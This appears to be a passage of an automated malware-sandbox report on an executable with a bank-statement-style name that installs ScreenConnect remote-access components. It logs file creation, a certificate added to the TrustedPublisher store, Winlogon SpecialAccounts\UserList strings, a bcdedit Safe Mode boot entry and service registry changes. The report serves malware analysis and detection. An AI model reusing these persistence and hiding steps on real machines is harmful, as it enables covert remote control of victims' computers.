                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: certificate valid
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsFileManager.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D8E9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2447633526.0000000002CA2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: monthly-eStatementForum120478962.Client.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1D8E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DDBC000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2445494046.00000000027A2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.3289162550.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000C.00000002.3288573826.00000000012B0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr, ScreenConnect.ClientService.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2436546858.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.2441384367.00000000009BD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.ClientService.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D916000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DC3E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2451601548.000000001BEB2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.WindowsBackstageShell.exe0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2436546858.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.2.dr, ScreenConnect.WindowsClient.exe.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D916000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DC3E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2451601548.000000001BEB2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.2.dr, ScreenConnect.Windows.dll.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D8E9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2447633526.0000000002CA2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr, ScreenConnect.Client.dll0.2.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000002.00000002.2973425425.0000025D1D738000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DB2A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2973425425.0000025D1DC3E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.2446246290.0000000004CB2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll0.2.dr, ScreenConnect.Core.dll.2.dr
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.WindowsBackstageShell.exe.2.drStatic PE information: 0xB80EE04C [Tue Nov 8 12:57:48 2067 UTC]
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009A1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_009A1000
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: real checksum: 0x1bda6 should be: 0x1d486
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009A1BC0 push ecx; ret 0_2_009A1BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848E2D2A5 pushad ; iretd 2_2_00007FF848E2D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F65FED push es; retf FFFFh2_2_00007FF848F65FEF
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F58E01 push 8B495C96h; iretd 2_2_00007FF848F58E0C
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F47D00 push eax; retf 2_2_00007FF848F47D1D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F58D31 push 8B495C96h; iretd 2_2_00007FF848F58D3C
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F400BD pushad ; iretd 2_2_00007FF848F400C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F4842E pushad ; ret 2_2_00007FF848F4845D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F4845E push eax; ret 2_2_00007FF848F4846D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 2_2_00007FF848F514F8 push E95C9A94h; ret 2_2_00007FF848F51529
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848F04162 push eax; ret 9_2_00007FF848F04163
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848F02D68 push eax; ret 9_2_00007FF848F02E7B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848F02FDA pushad ; retf 9_2_00007FF848F02FDB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848F03F3A pushad ; retf 9_2_00007FF848F03F3B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848F000BD pushad ; iretd 9_2_00007FF848F000C1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848F030BA push eax; iretd 9_2_00007FF848F030BB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF848F0401A push eax; iretd 9_2_00007FF848F0401B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF848F100BD pushad ; iretd 12_2_00007FF848F100C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Windows.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Core.dll
                  Source: ScreenConnect.ClientService.dll.2.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.2.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (4b43e651-6d21-48a4-a5c8-8436b8ee48ae)

                  Hooking and other Techniques for Hiding and Protection

                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2451601548.000000001BEB2000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000A.00000002.2445494046.00000000027A2000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000C.00000002.3289162550.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000C.00000002.3288573826.00000000012B0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.2.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll0.2.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.2.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.Windows.dll.2.dr String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: 25D1BC00000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Memory allocated: 25D356B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Memory allocated: 1470000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Memory allocated: 1AEA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Memory allocated: D60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Memory allocated: 2870000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Memory allocated: 26C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Memory allocated: 1BC0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Memory allocated: 1E10000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Memory allocated: 1C40000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Memory allocated: 1150000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe Memory allocated: 1ADE0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599875
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599765
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599653
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599544
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599437
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599309
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599188
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 599061
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598938
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598813
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598688
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598562
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598451
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Thread delayed: delay time: 598344
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598108Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597932Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597777Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597665Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597560Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597124Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597014Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596905Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595922Jump to behavior
